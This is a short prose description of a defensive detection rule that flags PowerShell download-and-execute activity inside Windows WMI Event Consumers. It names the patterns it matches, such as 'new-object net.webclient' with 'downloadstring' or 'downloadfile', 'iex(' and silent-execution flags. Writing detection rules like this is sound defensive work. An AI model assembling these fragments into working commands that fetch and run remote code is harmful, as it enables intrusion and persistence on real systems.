This detection rule is designed to identify suspicious scripting activities within Windows Management Instrumentation (WMI) Event Consumers. It targets commands that utilize PowerShell and indicates potential malicious intent by examining script-related keywords within the destination parameter of the WMI operations. The rule is focused on identifying patterns associated with both downloading and executing scripts. For instance, it looks for common PowerShell commands such as 'new-object net.webclient' followed by methods like 'downloadstring' or 'downloadfile'. Additionally, it captures other indicators such as the use of 'iex(' (Invoke-Expression) and specific flags used to execute PowerShell scripts silently, indicating attempts to obfuscate or legitimize malicious activity. The rule has a high severity level due to the potential serious implications of unauthorized script execution in an environment. While legitimate administrative scripts may trigger false positives, monitoring these events can help in identifying and mitigating the risk of exploitation through WMI.